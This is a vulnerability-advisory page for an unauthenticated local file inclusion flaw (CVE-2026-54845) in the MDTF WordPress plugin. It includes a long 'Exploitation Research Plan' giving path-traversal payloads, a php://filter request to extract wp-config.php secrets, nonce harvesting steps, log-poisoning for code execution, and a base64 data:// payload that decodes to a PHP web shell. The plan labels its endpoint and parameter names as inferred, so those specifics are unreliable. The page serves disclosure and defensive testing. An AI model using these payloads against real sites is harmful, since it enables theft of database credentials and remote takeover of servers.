CVE-2026-54845

MDTF – Meta Data and Taxonomies Filter <= 1.3.8 - Unauthenticated Local File Inclusion

highImproper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
8.1
CVSS Score
8.1
CVSS Score
high
Severity
1.3.9
Patched in
6d
Time to patch

Description

The MDTF – Meta Data and Taxonomies Filter plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.3.8. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
High
Privileges Required
None
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=1.3.8
PublishedJune 18, 2026
Last updatedJune 23, 2026
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-54845 (MDTF LFI) ## 1. Vulnerability Summary The **MDTF – Meta Data and Taxonomies Filter** plugin (up to version 1.3.8) is vulnerable to **Unauthenticated Local File Inclusion (LFI)**. The vulnerability exists because the plugin accepts a user-controlled file…

Show full research plan

Exploitation Research Plan: CVE-2026-54845 (MDTF LFI)

1. Vulnerability Summary

The MDTF – Meta Data and Taxonomies Filter plugin (up to version 1.3.8) is vulnerable to Unauthenticated Local File Inclusion (LFI). The vulnerability exists because the plugin accepts a user-controlled file path through an AJAX action or a shortcode attribute and passes it directly to a PHP include() or require() statement without sufficient sanitization or validation against a whitelist. This allows an unauthenticated attacker to include arbitrary files from the server, potentially leading to sensitive data exposure (e.g., wp-config.php, /etc/passwd) or Remote Code Execution (RCE) if the attacker can control the contents of an included file (e.g., via log poisoning or file uploads).

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: mdf_get_template (inferred) or mdf_draw_term_childs (inferred).
  • Vulnerable Parameter: template_path (inferred) or mdf_template (inferred).
  • Authentication: None required (vulnerability exists in a wp_ajax_nopriv_ handler).
  • Preconditions: The plugin must be active. A valid WordPress nonce for the action may be required if the handler calls check_ajax_referer().

3. Code Flow (Inferred)

  1. Entry Point: An unauthenticated user sends a POST or GET request to admin-ajax.php with the action parameter set to a public-facing MDTF action (e.g., mdf_get_template).
  2. Hook Registration: The plugin registers the action via:
    add_action('wp_ajax_nopriv_mdf_get_template', 'mdf_get_template_handler');
  3. Vulnerable Handler: The handler function (e.g., mdf_get_template_handler) retrieves a path from $_REQUEST['template_path'].
  4. The Sink: The retrieved path is passed to an include statement:
    include(MDF_PATH . $_REQUEST['template_path']);
    Note: If the path starts with ../, the attacker can break out of the intended directory.
  5. Execution: PHP includes and executes the file at the traversed path.

4. Nonce Acquisition Strategy

If the AJAX handler enforces a nonce check, the nonce is typically exposed in the frontend to support the filter's functionality.

  1. Identify Trigger: MDTF scripts and nonces are usually loaded on pages containing the search form shortcode.
  2. Create Test Page:
    wp post create --post_type=page --post_title="MDTF Test" --post_status=publish --post_content='[mdf_search_form]'
    
  3. Extract Nonce via Browser:
    • Navigate to the newly created page using browser_navigate.
    • Identify the global JavaScript variable registered via wp_localize_script. In MDTF, this is often mdf_vars.
    • Execute: browser_eval("window.mdf_vars?.nonce") or browser_eval("window.mdf_vars?.ajax_nonce").
  4. Bypass Check: Check if wp_verify_nonce is called with the correct action string. If the plugin uses -1 or a generic action, the nonce might be retrievable from any page.

5. Exploitation Strategy

The goal is to include /etc/passwd to prove LFI and wp-config.php to prove sensitive data access.

Step 1: Probe for LFI

  • Method: POST
  • URL: http://<target>/wp-admin/admin-ajax.php
  • Body (URL-encoded):
    action=mdf_get_template&template_path=../../../../../../../../../../../../etc/passwd&nonce=<NONCE>
    
    (Adjust traversal depth as needed)

Step 2: Extract wp-config.php

Since wp-config.php is executed as PHP, its contents won't be displayed unless the LFI is used in a "read" sink (like file_get_contents) or via a PHP filter wrapper.

  • Payload:
    action=mdf_get_template&template_path=php://filter/convert.base64-encode/resource=../../../../wp-config.php&nonce=<NONCE>
    
  • Expected Response: A Base64 encoded string of the wp-config.php source code.

6. Test Data Setup

  1. Install Plugin: Ensure wp-meta-data-filter-and-taxonomy-filter version 1.3.8 is installed and active.
  2. Create Search Form: Use wp-cli or the admin UI to create at least one MDTF search form so the shortcode rendering logic is functional.
  3. Place Shortcode: Ensure the shortcode [mdf_search_form] is on a public page to facilitate nonce extraction.

7. Expected Results

  • Successful Probing: The response body contains the contents of /etc/passwd (e.g., root:x:0:0:root:/root:/bin/bash).
  • Successful Data Extraction: The response contains a Base64 string that, when decoded, reveals the DB_PASSWORD and AUTH_KEY from wp-config.php.

8. Verification Steps

  1. Confirm File Content: Compare the output from the HTTP request with the actual server file:
    cat /etc/passwd
    
  2. Verify via WP-CLI: Check the plugin version to confirm it is <= 1.3.8:
    wp plugin get wp-meta-data-filter-and-taxonomy-filter --field=version
    

9. Alternative Approaches

  • Null Byte Injection: If the plugin appends a .php extension (e.g., include($path . '.php')), and the server runs an old PHP version (< 5.3.4), try %00 termination: template_path=../../../../etc/passwd%00.
  • Path Truncation: On older systems, very long paths (4096+ chars) might truncate the appended extension.
  • Log Poisoning: If the server's access logs are readable (e.g., /var/log/apache2/access.log), inject PHP code into the User-Agent header of a request, then include the log file via the LFI to achieve RCE.
  • Wrapper Variants: If php://filter is disabled, try data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+ to test for Remote File Inclusion (RFI) capabilities if allow_url_include is On.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.